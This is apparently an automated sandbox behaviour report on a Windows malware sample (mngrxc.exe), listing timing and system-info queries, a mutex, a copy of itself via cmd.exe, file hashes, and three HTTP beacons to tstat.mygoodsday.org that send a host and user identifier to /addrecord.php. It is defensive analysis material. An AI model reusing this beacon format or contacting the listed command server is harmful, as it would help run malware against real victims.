| Get Time | type = Ticks, time = 263000 |
|
4 | |
| Get Time | type = Ticks, time = 263015 |
|
4 | |
| Get Time | type = Ticks, time = 263031 |
|
10 | |
| Get Time | type = Ticks, time = 263046 |
|
4 | |
| Get Time | type = Ticks, time = 263109 |
|
8 | |
| Get Time | type = Ticks, time = 263171 |
|
2 | |
| Get Time | type = Ticks, time = 263187 |
|
10 | |
| Get Time | type = Ticks, time = 263609 |
|
2 | |
| Get Time | type = Ticks, time = 263625 |
|
4 | |
| Get Time | type = Ticks, time = 264250 |
|
4 | |
| Get Time | type = Ticks, time = 264265 |
|
6 | |
| Get Time | type = Ticks, time = 264562 |
|
2 | |
| Get Time | type = Ticks, time = 264578 |
|
6 | |
| Get Time | type = Ticks, time = 264609 |
|
14 | |
| Get Time | type = Ticks, time = 265234 |
|
2 | |
| Get Time | type = Ticks, time = 265265 |
|
6 | |
| Get Time | type = Ticks, time = 265281 |
|
8 | |
| Get Time | type = Ticks, time = 265296 |
|
6 | |
| Get Time | type = Ticks, time = 265703 |
|
10 | |
| Get Time | type = Ticks, time = 265734 |
|
2 | |
| Get Time | type = Ticks, time = 265750 |
|
4 | |
| Get Time | type = Ticks, time = 266546 |
|
4 | |
| Get Time | type = Ticks, time = 266562 |
|
4 | |
| Get Time | type = Ticks, time = 267015 |
|
10 | |
| Get Time | type = Ticks, time = 267046 |
|
4 | |
| Get Time | type = Ticks, time = 267062 |
|
8 | |
| Get Time | type = Ticks, time = 267078 |
|
16 | |
| Get Time | type = Ticks, time = 267281 |
|
4 | |
| Get Time | type = Ticks, time = 267296 |
|
10 | |
| Get Time | type = Ticks, time = 267328 |
|
14 | |
| Get Time | type = Ticks, time = 267406 |
|
14 | |
| Get Time | type = Ticks, time = 267421 |
|
8 | |
| Get Time | type = Ticks, time = 267531 |
|
6 | |
| Get Time | type = Ticks, time = 267593 |
|
4 | |
| Get Time | type = Ticks, time = 267609 |
|
12 | |
| Get Time | type = Ticks, time = 267625 |
|
6 | |
| Get Time | type = Ticks, time = 267828 |
|
4 | |
| Get Time | type = Ticks, time = 267859 |
|
6 | |
| Get Time | type = Ticks, time = 267875 |
|
2 | |
| Get Time | type = Ticks, time = 267953 |
|
1 | |
| Get Time | type = Ticks, time = 267968 |
|
4 | |
| Get Time | type = Ticks, time = 268203 |
|
1 | |
| Get Time | type = Ticks, time = 268281 |
|
2 | |
| Get Time | type = Ticks, time = 268296 |
|
10 | |
| Get Time | type = Ticks, time = 268312 |
|
2 | |
| Get Time | type = Ticks, time = 268343 |
|
3 | |
| Get Time | type = Ticks, time = 268375 |
|
1 | |
| Get Time | type = Ticks, time = 268390 |
|
4 | |
| Get Time | type = Ticks, time = 268531 |
|
14 | |
| Get Time | type = Ticks, time = 268546 |
|
12 | |
| Get Time | type = Ticks, time = 268671 |
|
2 | |
| Get Time | type = Ticks, time = 268921 |
|
2 | |
| Get Time | type = Ticks, time = 269046 |
|
4 | |
| Get Time | type = Ticks, time = 269062 |
|
8 | |
| Get Time | type = Ticks, time = 269187 |
|
2 | |
| Get Time | type = Ticks, time = 269453 |
|
6 | |
| Get Time | type = Ticks, time = 269687 |
|
2 | |
| Get Time | type = Ticks, time = 269828 |
|
3 | |
| Get Time | type = Ticks, time = 269843 |
|
5 | |
| Get Time | type = Ticks, time = 269968 |
|
4 | |
| Get Time | type = Ticks, time = 269984 |
|
14 | |
| Get Time | type = Ticks, time = 270250 |
|
8 | |
| Get Time | type = Ticks, time = 270265 |
|
8 | |
| Get Time | type = Ticks, time = 270281 |
|
4 | |
| Get Time | type = Ticks, time = 270437 |
|
2 | |
| Get Time | type = Ticks, time = 270453 |
|
10 | |
| Get Time | type = Ticks, time = 270500 |
|
2 | |
| Get Time | type = Ticks, time = 270687 |
|
2 | |
| Get Time | type = Ticks, time = 270703 |
|
13 | |
| Get Time | type = Ticks, time = 271234 |
|
9 | |
| Get Time | type = Ticks, time = 271250 |
|
22 | |
| Get Time | type = Ticks, time = 271265 |
|
12 | |
| Get Time | type = Ticks, time = 271484 |
|
10 | |
| Get Time | type = Ticks, time = 271500 |
|
8 | |
| Get Time | type = Ticks, time = 271515 |
|
6 | |
| Get Time | type = Ticks, time = 271765 |
|
8 | |
| Get Time | type = Ticks, time = 271921 |
|
6 | |
| Get Time | type = Ticks, time = 271937 |
|
12 | |
| Get Time | type = Ticks, time = 271953 |
|
4 | |
| Get Time | type = Ticks, time = 272406 |
|
14 | |
| Get Time | type = Ticks, time = 272546 |
|
6 | |
| Get Time | type = Ticks, time = 272562 |
|
19 | |
| Get Time | type = Ticks, time = 272609 |
|
1 | |
| Get Time | type = Ticks, time = 272625 |
|
17 | |
| Get Time | type = Ticks, time = 272640 |
|
9 | |
| Get Time | type = Ticks, time = 272656 |
|
10 | |
| Get Time | type = Ticks, time = 272718 |
|
8 | |
| Get Time | type = Ticks, time = 272734 |
|
6 | |
| Get Time | type = Ticks, time = 272750 |
|
2 | |
| Get Time | type = Ticks, time = 273296 |
|
14 | |
| Get Time | type = Ticks, time = 273500 |
|
16 | |
| Get Time | type = Ticks, time = 273515 |
|
4 | |
| Get Time | type = Ticks, time = 273562 |
|
15 | |
| Get Time | type = Ticks, time = 273578 |
|
25 | |
| Get Time | type = Ticks, time = 273609 |
|
6 | |
| Get Time | type = Ticks, time = 273625 |
|
2 | |
| Get Time | type = Ticks, time = 273640 |
|
5 | |
| Get Time | type = Ticks, time = 273656 |
|
3 | |
| Get Time | type = Ticks, time = 273734 |
|
1 | |
| Get Time | type = Ticks, time = 273750 |
|
11 | |
| Get Time | type = Ticks, time = 273765 |
|
12 | |
| Get Time | type = Ticks, time = 273781 |
|
4 | |
| Get Time | type = Ticks, time = 273906 |
|
2 | |
| Get Time | type = Ticks, time = 273921 |
|
26 | |
| Get Time | type = Ticks, time = 273937 |
|
14 | |
| Get Time | type = Ticks, time = 274125 |
|
2 | |
| Get Time | type = Ticks, time = 274187 |
|
6 | |
| Get Time | type = Ticks, time = 274203 |
|
22 | |
| Get Time | type = Ticks, time = 274218 |
|
20 | |
| Get Time | type = Ticks, time = 274250 |
|
4 | |
| Get Time | type = Ticks, time = 274265 |
|
20 | |
| Get Time | type = Ticks, time = 274281 |
|
20 | |
| Get Time | type = Ticks, time = 274406 |
|
4 | |
| Get Time | type = Ticks, time = 274421 |
|
16 | |
| Get Time | type = Ticks, time = 274500 |
|
2 | |
| Get Time | type = Ticks, time = 274515 |
|
6 | |
| Get Time | type = Ticks, time = 274656 |
|
6 | |
| Get Time | type = Ticks, time = 274671 |
|
4 | |
| Get Time | type = Ticks, time = 275203 |
|
6 | |
| Get Time | type = Ticks, time = 275218 |
|
13 | |
| Get Time | type = Ticks, time = 275234 |
|
13 | |
| Get Time | type = Ticks, time = 275500 |
|
4 | |
| Get Time | type = Ticks, time = 275515 |
|
8 | |
| Get Time | type = Ticks, time = 275531 |
|
10 | |
| Get Time | type = Ticks, time = 275656 |
|
4 | |
| Get Time | type = Ticks, time = 275671 |
|
14 | |
| Get Time | type = Ticks, time = 275687 |
|
12 | |
| Get Time | type = Ticks, time = 275968 |
|
12 | |
| Get Time | type = Ticks, time = 275984 |
|
14 | |
| Get Time | type = Ticks, time = 276000 |
|
12 | |
| Get Time | type = Ticks, time = 276171 |
|
4 | |
| Get Time | type = Ticks, time = 276187 |
|
10 | |
| Get Time | type = Ticks, time = 276203 |
|
12 | |
| Get Time | type = Ticks, time = 276437 |
|
2 | |
| Get Time | type = Ticks, time = 276453 |
|
6 | |
| Get Time | type = Ticks, time = 276484 |
|
2 | |
| Get Time | type = Ticks, time = 276500 |
|
9 | |
| Get Time | type = Ticks, time = 276796 |
|
3 | |
| Get Time | type = Ticks, time = 276812 |
|
8 | |
| Get Time | type = Ticks, time = 276828 |
|
12 | |
| Get Time | type = Ticks, time = 276890 |
|
2 | |
| Get Time | type = Ticks, time = 276906 |
|
10 | |
| Get Time | type = Ticks, time = 276921 |
|
12 | |
| Get Time | type = Ticks, time = 276984 |
|
2 | |
| Get Time | type = Ticks, time = 277000 |
|
14 | |
| Get Time | type = Ticks, time = 277062 |
|
14 | |
| Get Time | type = Ticks, time = 277343 |
|
8 | |
| Get Time | type = Ticks, time = 277359 |
|
12 | |
| Get Time | type = Ticks, time = 277375 |
|
12 | |
| Get Time | type = Ticks, time = 277468 |
|
4 | |
| Get Time | type = Ticks, time = 277484 |
|
2 | |
| Get Time | type = Ticks, time = 277703 |
|
24 | |
| Get Time | type = Ticks, time = 277718 |
|
18 | |
| Get Time | type = Ticks, time = 277828 |
|
7 | |
| Get Time | type = Ticks, time = 277843 |
|
15 | |
| Get Time | type = Ticks, time = 277859 |
|
14 | |
| Get Time | type = Ticks, time = 278015 |
|
12 | |
| Get Time | type = Ticks, time = 278031 |
|
16 | |
| Get Time | type = Ticks, time = 278046 |
|
4 | |
| Get Time | type = Ticks, time = 278109 |
|
4 | |
| Get Time | type = Ticks, time = 278125 |
|
17 | |
| Get Time | type = Ticks, time = 278140 |
|
25 | |
| Get Time | type = Ticks, time = 278234 |
|
16 | |
| Get Time | type = Ticks, time = 278250 |
|
10 | |
| Get Time | type = Ticks, time = 278265 |
|
4 | |
| Get Time | type = Ticks, time = 278375 |
|
10 | |
| Get Time | type = Ticks, time = 278390 |
|
12 | |
| Get Time | type = Ticks, time = 278406 |
|
14 | |
| Get Time | type = Ticks, time = 278468 |
|
2 | |
| Get Time | type = Ticks, time = 278484 |
|
12 | |
| Get Time | type = Ticks, time = 278500 |
|
14 | |
| Get Time | type = Ticks, time = 278718 |
|
10 | |
| Get Time | type = Ticks, time = 278734 |
|
12 | |
| Get Time | type = Ticks, time = 278765 |
|
1 | |
| Get Time | type = Ticks, time = 278781 |
|
13 | |
| Get Time | type = Ticks, time = 278796 |
|
5 | |
| Get Time | type = Ticks, time = 310062 |
|
1 | |
| Get Time | type = Ticks, time = 310078 |
|
4 | |
| Get Time | type = Ticks, time = 310093 |
|
2 | |
| Get Time | type = Ticks, time = 310109 |
|
10 | |
| Get Time | type = Ticks, time = 310171 |
|
4 | |
| Get Time | type = Ticks, time = 310187 |
|
7 | |
| Get Time | type = Ticks, time = 310203 |
|
7 | |
| Get Time | type = Ticks, time = 310218 |
|
2 | |
| Get Time | type = Ticks, time = 310250 |
|
4 | |
| Get Time | type = Ticks, time = 310296 |
|
2 | |
| Get Time | type = Ticks, time = 310312 |
|
6 | |
| Get Time | type = Ticks, time = 310328 |
|
2 | |
| Get Time | type = Ticks, time = 312609 |
|
2 | |
| Get Time | type = Ticks, time = 312718 |
|
4 | |
| Get Time | type = Ticks, time = 312734 |
|
4 | |
| Get Time | type = Ticks, time = 313015 |
|
6 | |
| Get Time | type = Ticks, time = 313062 |
|
2 | |
| Get Time | type = Ticks, time = 313109 |
|
6 | |
| Get Time | type = Ticks, time = 313125 |
|
8 | |
| Get Time | type = Ticks, time = 313140 |
|
8 | |
| Get Time | type = Ticks, time = 313156 |
|
2 | |
| Get Time | type = Ticks, time = 313187 |
|
11 | |
| Get Time | type = Ticks, time = 313203 |
|
9 | |
| Get Time | type = Ticks, time = 313218 |
|
4 | |
| Get Time | type = Ticks, time = 313234 |
|
6 | |
| Get Time | type = Ticks, time = 313281 |
|
8 | |
| Get Time | type = Ticks, time = 313296 |
|
2 | |
| Get Time | type = Ticks, time = 313312 |
|
12 | |
| Get Time | type = Ticks, time = 313328 |
|
10 | |
| Get Time | type = Ticks, time = 313343 |
|
10 | |
| Get Time | type = Ticks, time = 313359 |
|
2 | |
| Get Time | type = Ticks, time = 313375 |
|
8 | |
| Get Time | type = Ticks, time = 313390 |
|
10 | |
| Get Time | type = Ticks, time = 313484 |
|
10 | |
| Get Time | type = Ticks, time = 313500 |
|
8 | |
| Get Time | type = Ticks, time = 313515 |
|
12 | |
| Get Time | type = Ticks, time = 313531 |
|
8 | |
| Get Time | type = Ticks, time = 313546 |
|
12 | |
| Get Time | type = Ticks, time = 313562 |
|
8 | |
| Get Time | type = Ticks, time = 313578 |
|
4 | |
| Get Time | type = Ticks, time = 313640 |
|
14 | |
| Get Time | type = Ticks, time = 313656 |
|
9 | |
| Get Time | type = Ticks, time = 313671 |
|
7 | |
| Get Time | type = Ticks, time = 313687 |
|
6 | |
| Get Time | type = Ticks, time = 313734 |
|
8 | |
| Get Time | type = Ticks, time = 313750 |
|
6 | |
| Get Time | type = Ticks, time = 313812 |
|
6 | |
| Get Time | type = Ticks, time = 313828 |
|
6 | |
| Get Time | type = Ticks, time = 313859 |
|
4 | |
| Get Time | type = Ticks, time = 313875 |
|
8 | |
| Get Time | type = Ticks, time = 313906 |
|
6 | |
| Get Time | type = Ticks, time = 313921 |
|
6 | |
| Get Time | type = Ticks, time = 313953 |
|
8 | |
| Get Time | type = Ticks, time = 313968 |
|
15 | |
| Get Time | type = Ticks, time = 313984 |
|
9 | |
| Get Time | type = Ticks, time = 314000 |
|
13 | |
| Get Time | type = Ticks, time = 314015 |
|
9 | |
| Get Time | type = Ticks, time = 314093 |
|
6 | |
| Get Time | type = Ticks, time = 314109 |
|
16 | |
| Get Time | type = Ticks, time = 314125 |
|
4 | |
| Get Time | type = Ticks, time = 314171 |
|
6 | |
| Get Time | type = Ticks, time = 314218 |
|
2 | |
| Get Time | type = Ticks, time = 314234 |
|
10 | |
| Get Time | type = Ticks, time = 314390 |
|
10 | |
| Get Time | type = Ticks, time = 314406 |
|
14 | |
| Get Time | type = Ticks, time = 314421 |
|
14 | |
| Get Time | type = Ticks, time = 314437 |
|
2 | |
| Get Time | type = Ticks, time = 314453 |
|
8 | |
| Get Time | type = Ticks, time = 314468 |
|
4 | |
| Get Time | type = Ticks, time = 314484 |
|
8 | |
| Get Time | type = Ticks, time = 314500 |
|
5 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (4453)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexSPCT |
|
1 | |
| Create | - |
|
1 | |
| Open | mutex_name = MutexSPCT, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Release | - |
|
4450 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = tstat.mygoodsday.org, address_out = 49.51.173.30, service = 80 |
|
3 |
TCP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 726 bytes |
| Total Data Received | 534 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 49.51.173.30:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x280 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 49.51.173.30 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49429 |
| Data Sent | 230 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 49.51.173.30, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 230, size_out = 230 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0x2a8 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 49.51.173.30 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49558 |
| Data Sent | 246 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 49.51.173.30, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 246, size_out = 246 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #3
| Information | Value |
|---|---|
| Handle | 0x2ac |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 49.51.173.30 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49625 |
| Data Sent | 250 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 49.51.173.30, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 250, size_out = 250 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 178, size_out = 178 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 726 bytes |
| Total Data Received | 534 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | tstat.mygoodsday.org |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | tstat.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 230 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = tstat.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=START |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: tstat.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = tstat.mygoodsday.org/addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=START |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | tstat.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 246 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = tstat.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=[ALL]2AEAD63AEFB642A0 |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: tstat.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = tstat.mygoodsday.org/addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=[ALL]2AEAD63AEFB642A0 |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | tstat.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 250 |
| Data Received | 178 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = tstat.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=2AEAD63AEFB642A0|4583|1GB |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: tstat.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = tstat.mygoodsday.org/addrecord.php?apikey=SPCT_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=INMPht23PLeVlWwd&phase=2AEAD63AEFB642A0|4583|1GB |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
154
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:02, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2f4 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
51C
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000000f0000 | 0x000f0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00103fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00111fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00113fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00283fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002b0000 | 0x0036dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe.mui | 0x04540000 | 0x04560fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x0467ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x047affff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f420000 | 0x7f420000 | 0x7f51ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f520000 | 0x7f520000 | 0x7f542fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f547000 | 0x7f547000 | 0x7f549fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54a000 | 0x7f54a000 | 0x7f54cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54d000 | 0x7f54d000 | 0x7f54dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54f000 | 0x7f54f000 | 0x7f54ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe | 1.18 MB |
MD5:
be44421b0ed21690e082a1b43500745d
SHA1: 42c87d790916e7afaf732c67c9726d5b1c101dc6 SHA256: aad588dd12577aba808566cab9ce0a8a005fd6d78216c535e618f6a64b59b03f SSDeep: 24576:axsxl/OOeI7RC4CJR5ez+IlnRJE5OxBFrp+ac+lzf+:5fjRE8tpHl6 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
Host Behavior
File (114)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
23 | |
| Open | - | - |
|
24 | |
